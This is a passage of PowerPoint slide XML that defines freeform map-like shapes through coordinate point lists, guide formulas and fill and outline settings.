                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="48"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35892" name="Freeform 426"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1746" y="3255"/>
                <a:ext cx="133" cy="141"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 133"/>
                  <a:gd name="T1" fmla="*/ 112 h 141"/>
                  <a:gd name="T2" fmla="*/ 121 w 133"/>
                  <a:gd name="T3" fmla="*/ 129 h 141"/>
                  <a:gd name="T4" fmla="*/ 111 w 133"/>
                  <a:gd name="T5" fmla="*/ 137 h 141"/>
                  <a:gd name="T6" fmla="*/ 105 w 133"/>
                  <a:gd name="T7" fmla="*/ 138 h 141"/>
                  <a:gd name="T8" fmla="*/ 100 w 133"/>
                  <a:gd name="T9" fmla="*/ 137 h 141"/>
                  <a:gd name="T10" fmla="*/ 92 w 133"/>
                  <a:gd name="T11" fmla="*/ 140 h 141"/>
                  <a:gd name="T12" fmla="*/ 83 w 133"/>
                  <a:gd name="T13" fmla="*/ 139 h 141"/>
                  <a:gd name="T14" fmla="*/ 72 w 133"/>
                  <a:gd name="T15" fmla="*/ 136 h 141"/>
                  <a:gd name="T16" fmla="*/ 62 w 133"/>
                  <a:gd name="T17" fmla="*/ 138 h 141"/>
                  <a:gd name="T18" fmla="*/ 66 w 133"/>
                  <a:gd name="T19" fmla="*/ 133 h 141"/>
                  <a:gd name="T20" fmla="*/ 70 w 133"/>
                  <a:gd name="T21" fmla="*/ 128 h 141"/>
                  <a:gd name="T22" fmla="*/ 69 w 133"/>
                  <a:gd name="T23" fmla="*/ 122 h 141"/>
                  <a:gd name="T24" fmla="*/ 77 w 133"/>
                  <a:gd name="T25" fmla="*/ 105 h 141"/>
                  <a:gd name="T26" fmla="*/ 71 w 133"/>
                  <a:gd name="T27" fmla="*/ 99 h 141"/>
                  <a:gd name="T28" fmla="*/ 56 w 133"/>
                  <a:gd name="T29" fmla="*/ 93 h 141"/>
                  <a:gd name="T30" fmla="*/ 40 w 133"/>
                  <a:gd name="T31" fmla="*/ 81 h 141"/>
                  <a:gd name="T32" fmla="*/ 28 w 133"/>
                  <a:gd name="T33" fmla="*/ 78 h 141"/>
                  <a:gd name="T34" fmla="*/ 18 w 133"/>
                  <a:gd name="T35" fmla="*/ 69 h 141"/>
                  <a:gd name="T36" fmla="*/ 3 w 133"/>
                  <a:gd name="T37" fmla="*/ 51 h 141"/>
                  <a:gd name="T38" fmla="*/ 0 w 133"/>
                  <a:gd name="T39" fmla="*/ 48 h 141"/>
                  <a:gd name="T40" fmla="*/ 4 w 133"/>
                  <a:gd name="T41" fmla="*/ 37 h 141"/>
                  <a:gd name="T42" fmla="*/ 7 w 133"/>
                  <a:gd name="T43" fmla="*/ 23 h 141"/>
                  <a:gd name="T44" fmla="*/ 9 w 133"/>
                  <a:gd name="T45" fmla="*/ 17 h 141"/>
                  <a:gd name="T46" fmla="*/ 17 w 133"/>
                  <a:gd name="T47" fmla="*/ 6 h 141"/>
                  <a:gd name="T48" fmla="*/ 25 w 133"/>
                  <a:gd name="T49" fmla="*/ 4 h 141"/>
                  <a:gd name="T50" fmla="*/ 40 w 133"/>
                  <a:gd name="T51" fmla="*/ 1 h 141"/>
                  <a:gd name="T52" fmla="*/ 47 w 133"/>
                  <a:gd name="T53" fmla="*/ 0 h 141"/>
                  <a:gd name="T54" fmla="*/ 56 w 133"/>
                  <a:gd name="T55" fmla="*/ 0 h 141"/>
                  <a:gd name="T56" fmla="*/ 71 w 133"/>
                  <a:gd name="T57" fmla="*/ 9 h 141"/>
                  <a:gd name="T58" fmla="*/ 73 w 133"/>
                  <a:gd name="T59" fmla="*/ 17 h 141"/>
                  <a:gd name="T60" fmla="*/ 78 w 133"/>
                  <a:gd name="T61" fmla="*/ 31 h 141"/>
                  <a:gd name="T62" fmla="*/ 76 w 133"/>
                  <a:gd name="T63" fmla="*/ 43 h 141"/>
                  <a:gd name="T64" fmla="*/ 79 w 133"/>
                  <a:gd name="T65" fmla="*/ 49 h 141"/>
                  <a:gd name="T66" fmla="*/ 91 w 133"/>
                  <a:gd name="T67" fmla="*/ 51 h 141"/>
                  <a:gd name="T68" fmla="*/ 99 w 133"/>
                  <a:gd name="T69" fmla="*/ 48 h 141"/>
                  <a:gd name="T70" fmla="*/ 105 w 133"/>
                  <a:gd name="T71" fmla="*/ 50 h 141"/>
                  <a:gd name="T72" fmla="*/ 112 w 133"/>
                  <a:gd name="T73" fmla="*/ 57 h 141"/>
                  <a:gd name="T74" fmla="*/ 117 w 133"/>
                  <a:gd name="T75" fmla="*/ 81 h 141"/>
                  <a:gd name="T76" fmla="*/ 128 w 133"/>
                  <a:gd name="T77" fmla="*/ 78 h 141"/>
                  <a:gd name="T78" fmla="*/ 133 w 133"/>
                  <a:gd name="T79" fmla="*/ 81 h 141"/>
                  <a:gd name="T80" fmla="*/ 131 w 133"/>
                  <a:gd name="T81" fmla="*/ 88 h 141"/>
                  <a:gd name="T82" fmla="*/ 127 w 133"/>
                  <a:gd name="T83" fmla="*/ 101 h 141"/>
                  <a:gd name="T84" fmla="*/ 127 w 133"/>
                  <a:gd name="T85" fmla="*/ 111 h 141"/>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33"/>
                  <a:gd name="T130" fmla="*/ 0 h 141"/>
                  <a:gd name="T131" fmla="*/ 133 w 133"/>
                  <a:gd name="T132" fmla="*/ 141 h 141"/>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33" h="141">
                    <a:moveTo>
                      <a:pt x="127" y="111"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="127" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="111"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35893" name="Freeform 427"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1746" y="3255"/>
                <a:ext cx="133" cy="141"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 133"/>
                  <a:gd name="T1" fmla="*/ 112 h 141"/>
                  <a:gd name="T2" fmla="*/ 121 w 133"/>
                  <a:gd name="T3" fmla="*/ 129 h 141"/>
                  <a:gd name="T4" fmla="*/ 111 w 133"/>
                  <a:gd name="T5" fmla="*/ 137 h 141"/>
                  <a:gd name="T6" fmla="*/ 105 w 133"/>
                  <a:gd name="T7" fmla="*/ 138 h 141"/>
                  <a:gd name="T8" fmla="*/ 100 w 133"/>
                  <a:gd name="T9" fmla="*/ 137 h 141"/>
                  <a:gd name="T10" fmla="*/ 92 w 133"/>
                  <a:gd name="T11" fmla="*/ 140 h 141"/>
                  <a:gd name="T12" fmla="*/ 83 w 133"/>
                  <a:gd name="T13" fmla="*/ 139 h 141"/>
                  <a:gd name="T14" fmla="*/ 72 w 133"/>
                  <a:gd name="T15" fmla="*/ 136 h 141"/>
                  <a:gd name="T16" fmla="*/ 62 w 133"/>
                  <a:gd name="T17" fmla="*/ 138 h 141"/>
                  <a:gd name="T18" fmla="*/ 66 w 133"/>
                  <a:gd name="T19" fmla="*/ 133 h 141"/>
                  <a:gd name="T20" fmla="*/ 70 w 133"/>
                  <a:gd name="T21" fmla="*/ 128 h 141"/>
                  <a:gd name="T22" fmla="*/ 69 w 133"/>
                  <a:gd name="T23" fmla="*/ 122 h 141"/>
                  <a:gd name="T24" fmla="*/ 77 w 133"/>
                  <a:gd name="T25" fmla="*/ 105 h 141"/>
                  <a:gd name="T26" fmla="*/ 71 w 133"/>
                  <a:gd name="T27" fmla="*/ 99 h 141"/>
                  <a:gd name="T28" fmla="*/ 56 w 133"/>
                  <a:gd name="T29" fmla="*/ 93 h 141"/>
                  <a:gd name="T30" fmla="*/ 40 w 133"/>
                  <a:gd name="T31" fmla="*/ 81 h 141"/>
                  <a:gd name="T32" fmla="*/ 28 w 133"/>
                  <a:gd name="T33" fmla="*/ 78 h 141"/>
                  <a:gd name="T34" fmla="*/ 18 w 133"/>
                  <a:gd name="T35" fmla="*/ 69 h 141"/>
                  <a:gd name="T36" fmla="*/ 3 w 133"/>
                  <a:gd name="T37" fmla="*/ 51 h 141"/>
                  <a:gd name="T38" fmla="*/ 0 w 133"/>
                  <a:gd name="T39" fmla="*/ 48 h 141"/>
                  <a:gd name="T40" fmla="*/ 4 w 133"/>
                  <a:gd name="T41" fmla="*/ 37 h 141"/>
                  <a:gd name="T42" fmla="*/ 7 w 133"/>
                  <a:gd name="T43" fmla="*/ 23 h 141"/>
                  <a:gd name="T44" fmla="*/ 9 w 133"/>
                  <a:gd name="T45" fmla="*/ 17 h 141"/>
                  <a:gd name="T46" fmla="*/ 17 w 133"/>
                  <a:gd name="T47" fmla="*/ 6 h 141"/>
                  <a:gd name="T48" fmla="*/ 25 w 133"/>
                  <a:gd name="T49" fmla="*/ 4 h 141"/>
                  <a:gd name="T50" fmla="*/ 40 w 133"/>
                  <a:gd name="T51" fmla="*/ 1 h 141"/>
                  <a:gd name="T52" fmla="*/ 47 w 133"/>
                  <a:gd name="T53" fmla="*/ 0 h 141"/>
                  <a:gd name="T54" fmla="*/ 56 w 133"/>
                  <a:gd name="T55" fmla="*/ 0 h 141"/>
                  <a:gd name="T56" fmla="*/ 71 w 133"/>
                  <a:gd name="T57" fmla="*/ 9 h 141"/>
                  <a:gd name="T58" fmla="*/ 73 w 133"/>
                  <a:gd name="T59" fmla="*/ 17 h 141"/>
                  <a:gd name="T60" fmla="*/ 78 w 133"/>
                  <a:gd name="T61" fmla="*/ 31 h 141"/>
                  <a:gd name="T62" fmla="*/ 76 w 133"/>
                  <a:gd name="T63" fmla="*/ 43 h 141"/>
                  <a:gd name="T64" fmla="*/ 79 w 133"/>
                  <a:gd name="T65" fmla="*/ 49 h 141"/>
                  <a:gd name="T66" fmla="*/ 91 w 133"/>
                  <a:gd name="T67" fmla="*/ 51 h 141"/>
                  <a:gd name="T68" fmla="*/ 99 w 133"/>
                  <a:gd name="T69" fmla="*/ 48 h 141"/>
                  <a:gd name="T70" fmla="*/ 105 w 133"/>
                  <a:gd name="T71" fmla="*/ 50 h 141"/>
                  <a:gd name="T72" fmla="*/ 112 w 133"/>
                  <a:gd name="T73" fmla="*/ 57 h 141"/>
                  <a:gd name="T74" fmla="*/ 117 w 133"/>
                  <a:gd name="T75" fmla="*/ 81 h 141"/>
                  <a:gd name="T76" fmla="*/ 128 w 133"/>
                  <a:gd name="T77" fmla="*/ 78 h 141"/>
                  <a:gd name="T78" fmla="*/ 133 w 133"/>
                  <a:gd name="T79" fmla="*/ 81 h 141"/>
                  <a:gd name="T80" fmla="*/ 131 w 133"/>
                  <a:gd name="T81" fmla="*/ 88 h 141"/>
                  <a:gd name="T82" fmla="*/ 127 w 133"/>
                  <a:gd name="T83" fmla="*/ 101 h 141"/>
                  <a:gd name="T84" fmla="*/ 127 w 133"/>
                  <a:gd name="T85" fmla="*/ 111 h 141"/>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33"/>
                  <a:gd name="T130" fmla="*/ 0 h 141"/>
                  <a:gd name="T131" fmla="*/ 133 w 133"/>
                  <a:gd name="T132" fmla="*/ 141 h 141"/>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33" h="141">
                    <a:moveTo>
                      <a:pt x="127" y="111"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="127" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="81"/>
